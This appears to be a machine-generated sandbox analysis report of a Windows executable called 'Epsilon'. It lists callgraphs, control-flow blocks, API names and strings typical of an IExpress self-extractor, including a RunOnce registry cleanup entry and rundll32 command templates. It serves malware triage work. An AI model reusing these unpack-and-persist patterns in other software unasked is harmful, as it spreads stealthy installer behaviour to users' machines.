7ff737826666 RemoveDirectoryA 2781->2782 2782->2773 2783->2604 2785 7ff7378224c4 2784->2785 2786 7ff7378224a6 2784->2786 2788 7ff737828470 7 API calls 2785->2788 2787 7ff737824dcc 24 API calls 2786->2787 2787->2785 2789 7ff7378224df 2788->2789 2789->2619 2789->2626 2792 7ff7378263e3 2790->2792 2791 7ff73782114c _vsnprintf 2791->2792 2792->2791 2793 7ff737827ba8 CharPrevA 2792->2793 2796 7ff73782644b GetTempFileNameA 2792->2796 2794 7ff737826420 RemoveDirectoryA GetFileAttributesA 2793->2794 2794->2792 2795 7ff7378264b6 CreateDirectoryA 2794->2795 2795->2796 2797 7ff737826490 2795->2797 2796->2797 
2798 7ff73782646b DeleteFileA CreateDirectoryA 2796->2798 2799 7ff737828470 7 API calls 2797->2799 2798->2797 2800 7ff7378264a2 2799->2800 2800->2767 2800->2768 2800->2773 2802 7ff737826b8b 2801->2802 2802->2802 2803 7ff737826b94 LocalAlloc 2802->2803 2804 7ff737826bb4 2803->2804 2805 7ff737826bf5 2803->2805 2806 7ff737824dcc 24 API calls 2804->2806 2809 7ff737827ba8 CharPrevA 2805->2809 2807 7ff737826bd2 2806->2807 2811 7ff737826626 2807->2811 2814 7ff737827700 GetLastError 2807->2814 2810 7ff737826c14 CreateFileA LocalFree 2809->2810 2810->2807 2812 7ff737826c61 CloseHandle GetFileAttributesA 2810->2812 2811->2770 2811->2774 2812->2807 2813->2778 2814->2811 2815->2651 2816->2657 2818 7ff737822562 2817->2818 2819 7ff737822525 2817->2819 2821 7ff737822567 2818->2821 2824 7ff7378225ab 2818->2824 2820 7ff73782114c _vsnprintf 2819->2820 2822 7ff73782253d 2820->2822 2823 7ff73782114c _vsnprintf 2821->2823 2825 7ff737824dcc 24 API calls 2822->2825 2827 7ff73782257f 2823->2827 2828 7ff73782114c _vsnprintf 2824->2828 2829 7ff73782255d 2824->2829 2825->2829 2826 7ff737828470 7 API calls 2830 7ff737822609 2826->2830 2831 7ff737824dcc 24 API calls 2827->2831 2832 7ff7378225c7 2828->2832 2829->2826 2830->2655 2831->2829 2833 7ff737824dcc 24 API calls 2832->2833 2833->2829 2834->2648 2836 7ff737825ced 2835->2836 2846 7ff737825d62 2835->2846 2837 7ff737825380 29 API calls 2836->2837 2839 7ff737825d04 2837->2839 2838 7ff737828470 7 API calls 2840 7ff737825d78 2838->2840 2841 7ff737825d0d #21 2839->2841 2839->2846 2840->2673 2840->2674 2842 7ff737825d28 2841->2842 2841->2846 2843 7ff737825770 CloseHandle 2842->2843 2842->2846 2844 7ff737825d4a 2843->2844 2845 7ff737825d4f #23 2844->2845 2844->2846 2845->2846 2846->2838 2848 7ff7378216d3 2847->2848 2939 7ff7378215e8 2848->2939 2851 7ff737827ba8 CharPrevA 2853 7ff737821766 2851->2853 2852 7ff737827d68 2 API calls 2854 7ff737821811 2852->2854 2853->2852 2855 7ff73782181a CompareStringA 2854->2855 2856 7ff737821a1b 2854->2856 
2855->2856 2858 7ff73782184d GetFileAttributesA 2855->2858 2857 7ff737827d68 2 API calls 2856->2857 2859 7ff737821a28 2857->2859 2860 7ff737821867 2858->2860 2861 7ff7378219f3 2858->2861 2862 7ff737821acb LocalAlloc 2859->2862 2863 7ff737821a31 CompareStringA 2859->2863 2860->2861 2864 7ff7378215e8 2 API calls 2860->2864 2866 7ff737824dcc 24 API calls 2861->2866 2862->2861 2865 7ff737821aeb GetFileAttributesA 2862->2865 2863->2862 2873 7ff737821a60 2863->2873 2867 7ff73782188b 2864->2867 2871 7ff737821b01 2865->2871 2885 7ff73782194f 2866->2885 2869 7ff7378218b5 LocalAlloc 2867->2869 2874 7ff7378215e8 2 API calls 2867->2874 2868 7ff737821bd1 2872 7ff737828470 7 API calls 2868->2872 2869->2861 2870 7ff7378218d7 GetPrivateProfileIntA GetPrivateProfileStringA 2869->2870 2875 7ff737821984 2870->2875 2870->2885 2883 7ff737821b54 2871->2883 2876 7ff737821be9 2872->2876 2873->2873 2877 7ff737821a81 LocalAlloc 2873->2877 2874->2869 2879 7ff7378219ba 2875->2879 2880 7ff737821995 GetShortPathNameA 2875->2880 2876->2707 2877->2861 2881 7ff737821ab2 2877->2881 2884 7ff73782114c _vsnprintf 2879->2884 2880->2879 2882 7ff73782114c _vsnprintf 2881->2882 2882->2885 2947 7ff737822a6c 2883->2947 2884->2885 2885->2868 2887 7ff737822019 2886->2887 2888 7ff737821dce 2886->2888 2889 7ff737828470 7 API calls 2887->2889 2890 7ff73782114c _vsnprintf 2888->2890 2893 7ff737821e25 2888->2893 2891 7ff737822028 2889->2891 2892 7ff737821dee RegQueryValueExA 2890->2892 2891->2707 2892->2888 2892->2893 2894 7ff737821e29 RegCloseKey 2893->2894 2895 7ff737821e46 GetSystemDirectoryA 2893->2895 2894->2887 2896 7ff737827ba8 CharPrevA 2895->2896 2897 7ff737821e6a LoadLibraryA 2896->2897 2898 7ff737821e86 GetProcAddress FreeLibrary 2897->2898 2899 7ff737821f55 GetModuleFileNameA 2897->2899 2898->2899 2901 7ff737821ebe GetSystemDirectoryA 2898->2901 2900 7ff737821f78 RegCloseKey 2899->2900 2904 7ff737821ee8 2899->2904 2900->2887 2902 7ff737821ed5 2901->2902 2901->2904 2903 7ff737827ba8 CharPrevA 2902->2903 
2903->2904 2904->2904 2905 7ff737821f11 LocalAlloc 2904->2905 2906 7ff737821f8e 2905->2906 2907 7ff737821f35 2905->2907 2909 7ff73782114c _vsnprintf 2906->2909 2908 7ff737824dcc 24 API calls 2907->2908 2910 7ff737821f53 2908->2910 2911 7ff737821fc4 2909->2911 2910->2900 2911->2911 2912 7ff737821fcd RegSetValueExA RegCloseKey LocalFree 2911->2912 2912->2887 2914 7ff7378247c2 WaitForSingleObject GetExitCodeProcess 2913->2914 2915 7ff7378248b3 2913->2915 2921 7ff7378247f9 2914->2921 2974 7ff737827700 GetLastError 2915->2974 2917 7ff7378248b8 GetLastError FormatMessageA 2919 7ff737824dcc 24 API calls 2917->2919 2918 7ff73782482a CloseHandle CloseHandle 2922 7ff73782491c 2918->2922 2924 7ff7378248aa 2918->2924 2919->2922 2921->2918 2923 7ff737822318 18 API calls 2921->2923 2925 7ff737828470 7 API calls 2922->2925 2927 7ff73782484d 2923->2927 2924->2922 2926 7ff73782492f 2925->2926 2926->2707 2927->2918 2929 7ff737827a25 2928->2929 2930 7ff737827ba8 CharPrevA 2929->2930 2931 7ff737827a63 GetFileAttributesA 2930->2931 2932 7ff737827a79 2931->2932 2933 7ff737827a96 LoadLibraryA 2931->2933 2932->2933 2934 7ff737827a7d LoadLibraryExA 2932->2934 2935 7ff737827aa9 2933->2935 2934->2935 2936 7ff737828470 7 API calls 2935->2936 2937 7ff737827ab9 2936->2937 2937->2730 2938->2693 2941 7ff737821609 2939->2941 2942 7ff737821621 2941->2942 2943 7ff737821651 2941->2943 2960 7ff737827ce8 2941->2960 2944 7ff737827ce8 2 API calls 2942->2944 2943->2851 2943->2853 2945 7ff73782162f 2944->2945 2945->2943 2946 7ff737827ce8 2 API calls 2945->2946 2946->2945 2948 7ff737822c24 2947->2948 2949 7ff737822aa0 GetModuleFileNameA 2947->2949 2950 7ff737828470 7 API calls 2948->2950 2949->2948 2959 7ff737822ac8 2949->2959 2951 7ff737822c37 2950->2951 2951->2868 2952 7ff737822acc IsDBCSLeadByte 2952->2959 2953 7ff737822af1 CharNextA CharUpperA 2955 7ff737822b9b CharUpperA 2953->2955 2953->2959 2954 7ff737822bf6 CharNextA 2956 7ff737822c08 CharNextA 2954->2956 2955->2959 2956->2948 2956->2952 2958 
7ff737822b36 CharPrevA 2958->2959 2959->2952 2959->2953 2959->2954 2959->2956 2959->2958 2965 7ff737827c40 2959->2965 2963 7ff737827d00 2960->2963 2961 7ff737827d47 2961->2941 2962 7ff737827d0a IsDBCSLeadByte 2962->2961 2962->2963 2963->2961 2963->2962 2964 7ff737827d30 CharNextA 2963->2964 2964->2963 2966 7ff737827c58 2965->2966 2966->2966 2967 7ff737827c61 CharPrevA 2966->2967 2968 7ff737827c7d CharPrevA 2967->2968 2969 7ff737827c94 2968->2969 2970 7ff737827c75 2968->2970 2971 7ff737827cc7 2969->2971 2972 7ff737827c9e CharPrevA 2969->2972 2973 7ff737827cb5 CharNextA 2969->2973 2970->2968 2970->2969 2971->2959 2972->2971 2972->2973 2973->2971 2974->2917 2976 7ff7378222eb 2975->2976 2977 7ff737822281 2975->2977 2979 7ff737828470 7 API calls 2976->2979 2978 7ff737827ba8 CharPrevA 2977->2978 2980 7ff737822294 WritePrivateProfileStringA _lopen 2978->2980 2981 7ff7378222fd 2979->2981 2980->2976 2982 7ff7378222c7 _llseek _lclose 2980->2982 2981->2385 2982->2976

Callgraph
                                                                                callgraph 0 Function_00007FF7378270A8 2 Function_00007FF737827BA8 0->2 24 Function_00007FF737827024 0->24 26 Function_00007FF737828648 0->26 28 Function_00007FF737824DCC 0->28 49 Function_00007FF737827CE8 0->49 51 Function_00007FF737827D68 0->51 62 Function_00007FF737828470 0->62 1 Function_00007FF737821D28 1->2 1->28 30 Function_00007FF73782114C 1->30 1->62 94 Function_00007FF737821084 2->94 3 Function_00007FF73782772C 3->30 3->62 4 Function_00007FF73782512C 75 Function_00007FF737821008 4->75 4->94 5 Function_00007FF7378278B0 5->2 5->62 6 Function_00007FF7378258B0 6->4 16 Function_00007FF737825B18 6->16 39 Function_00007FF7378251BC 6->39 58 Function_00007FF737825770 6->58 6->62 84 Function_00007FF73782527C 6->84 85 Function_00007FF737825380 6->85 7 Function_00007FF737824A30 8 Function_00007FF737823530 8->2 22 Function_00007FF737826CA4 8->22 8->28 48 Function_00007FF737824C68 8->48 57 Function_00007FF737826B70 8->57 68 Function_00007FF737824A60 8->68 9 Function_00007FF7378281B0 10 Function_00007FF737828930 11 Function_00007FF737828B30 12 Function_00007FF737822DB4 12->0 25 Function_00007FF737827AC8 12->25 27 Function_00007FF73782204C 12->27 12->28 32 Function_00007FF737825050 12->32 55 Function_00007FF7378212EC 12->55 12->62 64 Function_00007FF737823BF4 12->64 13 Function_00007FF737827E34 14 Function_00007FF737822834 19 Function_00007FF73782261C 14->19 15 Function_00007FF737822318 47 Function_00007FF737822244 15->47 17 Function_00007FF737828417 18 Function_00007FF737828818 41 Function_00007FF7378287BC 18->41 19->2 19->62 19->75 20 Function_00007FF737828A9C 21 Function_00007FF7378233A0 22->28 22->62 83 Function_00007FF7378224F8 22->83 86 Function_00007FF737827700 22->86 23 Function_00007FF7378260A4 23->28 23->32 23->86 25->28 82 Function_00007FF737828494 26->82 27->2 27->27 27->62 27->94 28->13 28->30 28->62 28->75 93 Function_00007FF737827F04 28->93 29 Function_00007FF7378211CC 29->62 31 
Function_00007FF73782494C 31->28 31->32 33 Function_00007FF7378280D0 33->18 63 Function_00007FF737828870 33->63 34 Function_00007FF737827850 35 Function_00007FF7378288D0 35->10 91 Function_00007FF737828880 35->91 36 Function_00007FF737828750 37 Function_00007FF737822C54 37->12 37->15 37->28 53 Function_00007FF7378261EC 37->53 54 Function_00007FF7378230EC 37->54 76 Function_00007FF737821C0C 37->76 38 Function_00007FF7378263B8 38->2 38->30 38->62 38->75 39->25 40 Function_00007FF73782473C 40->15 40->28 40->62 40->86 42 Function_00007FF737827C40 43 Function_00007FF737823840 43->48 44 Function_00007FF737823B40 45 Function_00007FF7378266C4 45->2 45->22 45->25 45->28 45->32 52 Function_00007FF737822468 45->52 45->62 73 Function_00007FF7378264E4 45->73 45->86 46 Function_00007FF7378240C4 46->1 46->2 46->28 46->30 46->32 46->40 60 Function_00007FF7378279F0 46->60 46->62 46->86 92 Function_00007FF737821684 46->92 47->2 47->62 48->62 50 Function_00007FF7378215E8 50->49 52->28 52->62 53->27 53->42 53->62 54->2 54->3 54->15 54->22 54->23 54->25 54->28 54->31 54->45 54->46 54->62 65 Function_00007FF737823F74 54->65 72 Function_00007FF737825FE4 54->72 78 Function_00007FF737825D90 54->78 54->86 55->29 55->62 56 Function_00007FF737822A6C 56->42 56->62 56->75 57->2 57->28 57->75 57->86 59 Function_00007FF7378233F0 59->48 60->2 60->62 61 Function_00007FF737825870 62->82 64->13 64->14 64->28 64->62 64->93 65->25 65->28 65->32 65->86 66 Function_00007FF7378255E0 67 Function_00007FF7378257E0 68->28 68->75 69 Function_00007FF737825C60 69->58 69->62 69->85 70 Function_00007FF737828A62 70->20 71 Function_00007FF737828B60 72->3 72->28 72->32 73->2 73->22 73->38 73->57 73->62 73->86 74 Function_00007FF737828964 76->28 76->62 77 Function_00007FF737825690 77->44 78->28 78->32 78->69 79 Function_00007FF737823910 79->28 79->44 79->48 80 Function_00007FF737828910 81 Function_00007FF737828790 83->28 83->30 83->62 84->28 84->75 85->28 87 Function_00007FF737821500 87->48 87->62 88 
Function_00007FF737827E00 89 Function_00007FF737828802 90 Function_00007FF737828200 90->35 90->37 90->74 92->2 92->28 92->30 92->50 92->51 92->56 92->62 92->75 92->94 93->62

Control-flow Graph
                                                                                control_flow_graph 0 7ff7378240c4-7ff737824116 1 7ff737824118-7ff737824133 call 7ff737825050 0->1 2 7ff737824139-7ff737824141 0->2 1->2 9 7ff737824254-7ff73782427d call 7ff737824dcc 1->9 4 7ff737824145-7ff737824167 memset 2->4 6 7ff73782416d-7ff737824188 call 7ff737825050 4->6 7 7ff737824282-7ff737824295 4->7 6->9 18 7ff73782418e-7ff737824194 6->18 8 7ff737824299-7ff7378242a3 7->8 12 7ff7378242b7-7ff7378242c2 8->12 13 7ff7378242a5-7ff7378242ab 8->13 19 7ff7378244ee 9->19 17 7ff7378242c5-7ff7378242c8 12->17 13->12 16 7ff7378242ad-7ff7378242b5 13->16 16->8 16->12 20 7ff737824328-7ff73782433d call 7ff737821684 17->20 21 7ff7378242ca-7ff7378242e2 call 7ff737825050 17->21 22 7ff73782419d-7ff7378241a0 18->22 23 7ff737824196-7ff73782419b 18->23 24 7ff7378244f0-7ff73782451f call 7ff737828470 19->24 20->19 35 7ff737824343-7ff73782434a 20->35 21->9 38 7ff7378242e8-7ff7378242ef 21->38 27 7ff7378241ad-7ff7378241af 22->27 28 7ff7378241a2-7ff7378241ab 22->28 26 7ff7378241b5 23->26 30 7ff7378241b8-7ff7378241bb 26->30 27->30 31 7ff7378241b1 27->31 28->26 30->17 36 7ff7378241c1-7ff7378241cb 30->36 31->26 39 7ff73782436a-7ff73782436c 35->39 40 7ff73782434c-7ff737824353 35->40 41 7ff7378241cd-7ff7378241d0 36->41 42 7ff737824231-7ff737824234 36->42 43 7ff7378245d8-7ff7378245df 38->43 44 7ff7378242f5-7ff737824322 CompareStringA 38->44 50 7ff737824372-7ff737824379 39->50 51 7ff737824493-7ff73782449b 39->51 40->39 45 7ff737824355-7ff73782435c 40->45 46 7ff7378241db-7ff7378241dd 41->46 47 7ff7378241d2-7ff7378241d9 41->47 42->20 52 7ff73782423a-7ff737824252 call 7ff737825050 42->52 48 7ff73782472d-7ff73782472f 43->48 49 7ff7378245e5-7ff7378245ec 43->49 44->20 44->43 45->39 53 7ff73782435e-7ff737824360 45->53 46->19 55 7ff7378241e3 46->55 54 7ff7378241ea-7ff7378241fb call 7ff737825050 47->54 48->24 49->48 56 7ff7378245f2-7ff737824621 RegOpenKeyExA 49->56 57 7ff737824599-7ff7378245d3 call 7ff737824dcc LocalFree 
50->57 58 7ff73782437f-7ff737824381 50->58 59 7ff73782449d-7ff7378244a4 call 7ff73782473c 51->59 60 7ff7378244df-7ff7378244e9 LocalFree 51->60 52->9 52->17 53->50 63 7ff737824362-7ff737824365 call 7ff737821d28 53->63 54->9 79 7ff7378241fd-7ff73782422d CompareStringA 54->79 55->54 56->48 64 7ff737824627-7ff737824666 RegQueryValueExA 56->64 57->19 58->51 66 7ff737824387-7ff73782438e 58->66 69 7ff7378244a9-7ff7378244ab 59->69 60->19 63->39 72 7ff73782471c-7ff737824728 RegCloseKey 64->72 73 7ff73782466c-7ff73782469b memset GetSystemDirectoryA 64->73 66->51 75 7ff737824394-7ff73782439f call 7ff7378279f0 66->75 69->60 76 7ff7378244ad-7ff7378244c3 LocalFree 69->76 72->48 77 7ff73782469d-7ff7378246ae call 7ff737827ba8 73->77 78 7ff7378246b3-7ff7378246dc call 7ff73782114c 73->78 86 7ff737824574-7ff737824597 call 7ff737824dcc 75->86 87 7ff7378243a5-7ff7378243c1 GetProcAddress 75->87 76->43 81 7ff7378244c9-7ff7378244ce 76->81 77->78 89 7ff7378246e3-7ff7378246ea 78->89 79->42 81->4 99 7ff737824553-7ff73782456f LocalFree call 7ff737827700 86->99 90 7ff7378243c7-7ff737824415 87->90 91 7ff737824521-7ff73782454e call 7ff737824dcc FreeLibrary 87->91 89->89 92 7ff7378246ec-7ff737824717 RegSetValueExA 89->92 93 7ff737824417-7ff73782441b 90->93 94 7ff73782441f-7ff737824427 90->94 91->99 92->72 93->94 97 7ff737824429-7ff73782442d 94->97 98 7ff737824431-7ff737824433 94->98 97->98 101 7ff73782443d-7ff737824445 98->101 102 7ff737824435-7ff737824439 98->102 99->19 104 7ff737824447-7ff73782444b 101->104 105 7ff73782444f-7ff737824451 101->105 102->101 104->105 107 7ff73782445b-7ff73782447e 105->107 108 7ff737824453-7ff737824457 105->108 110 7ff737824480-7ff737824491 FreeLibrary 107->110 111 7ff7378244d3-7ff7378244da FreeLibrary 107->111 108->107 110->76 111->60
APIs
Strings
Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                • String ID: <None>$ADMQCMD$Adv$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                • API String ID: 2679723528-341215196
                                                                                • Opcode ID: 854d9c80f2254312e823b66bd278a415edc9e6cc3862270eb2c3b0832d714124
                                                                                • Instruction ID: 6a9a6bc97071ee7b7193ac3337127a1ddb227124d0b09c7c104fc6830c573232
                                                                                • Opcode Fuzzy Hash: 854d9c80f2254312e823b66bd278a415edc9e6cc3862270eb2c3b0832d714124
                                                                                • Instruction Fuzzy Hash: C1028071A0C64AA6E720AF10E8406F9BFA0FB8474AFD40135DA4D53694DF7CE966E730

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                • API String ID: 178549006-1709460465
                                                                                • Opcode ID: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                                • Instruction ID: 0bd307f7b1ffe97a46e2469717b27b091dc452b8d48b19776c83e17ea010a51d
                                                                                • Opcode Fuzzy Hash: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                                • Instruction Fuzzy Hash: 50816E32A0CA89A6EB10AF11E8402F9FFA0FB89B56F955131DA4E13754DF3CD126D750

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                • API String ID: 383838535-1383298736
                                                                                • Opcode ID: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                                • Instruction ID: 95f304301d65915726a427729ef5187fd0614ad70c914430c5a08a085f9ad5d8
                                                                                • Opcode Fuzzy Hash: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                                • Instruction Fuzzy Hash: 01E1AF62A0D68AA5EB11AF10D4402FABFA0EB45746FE44135DA4D03795DF3DE52BD320

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                • API String ID: 3973824516-559629209
                                                                                • Opcode ID: d295679648a35d68ebefb1592e78e7fb96753640c5d4a5d15ac06b69cba29707
                                                                                • Instruction ID: efc6be0cd48548213f10f6cde0248a77e541a61b119dd289bf7055df7cc67aa3
                                                                                • Opcode Fuzzy Hash: d295679648a35d68ebefb1592e78e7fb96753640c5d4a5d15ac06b69cba29707
                                                                                • Instruction Fuzzy Hash: 86D17E22B1C68AA7EB10AF20D4502FAEFA1FB85742FD44135DA4E43A95DF3DD816D720

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                                                • String ID: $Adv$EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
                                                                                • API String ID: 3100096412-78895606
                                                                                • Opcode ID: 23b77a797956e355edfda7369f95b74ab6b4eb47665e611118273c2d92ba21bd
                                                                                • Instruction ID: fe1fd086dd253012cfa4fcc9ca2c261793b57cb18bd5de6fe29e58b792ff1484
                                                                                • Opcode Fuzzy Hash: 23b77a797956e355edfda7369f95b74ab6b4eb47665e611118273c2d92ba21bd
                                                                                • Instruction Fuzzy Hash: EC817A61A0C64BB6F720BB11A8147F9EE90BF88746FC04035D94D56AA5CF7CA427EB30

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                • API String ID: 4237285672-1193786559
                                                                                • Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                • Instruction ID: c5890194483e7b98c1576c6a047feba118d85ab40d8f3e92b76c9c2cecd3271a
                                                                                • Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                • Instruction Fuzzy Hash: 30A18F36A0C646A7E720AF20E4446EAFFA0FB89745F904135DA4D43B94CF3DE42ADB10

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
                                                                                • Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                • String ID: *MEMCAB$CABINET
                                                                                • API String ID: 1305606123-2642027498
                                                                                • Opcode ID: 12e41cc1847b5f8b0fa491761e3488ad6540e57cdb73ef1ed4f48c4a56cb0094
                                                                                • Instruction ID: 66f43a000d165236e3b462912a389bbd98e743bb38109f97ee3dd95c663d1cfe
                                                                                • Opcode Fuzzy Hash: 12e41cc1847b5f8b0fa491761e3488ad6540e57cdb73ef1ed4f48c4a56cb0094
                                                                                • Instruction Fuzzy Hash: FD511631A0DB4AA6EB10AB10E8542F5FFA0FF8974AFC49175C94D42664DF7CE026E760

                                                                                Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021514549.00007FF737821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF737820000, based on PE: true
• Associated: 00000000.00000002.2021497409.00007FF737820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021532240.00007FF737829000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021548676.00007FF73782C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff737820000_Epsilon.jbxd
Similarity
• API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
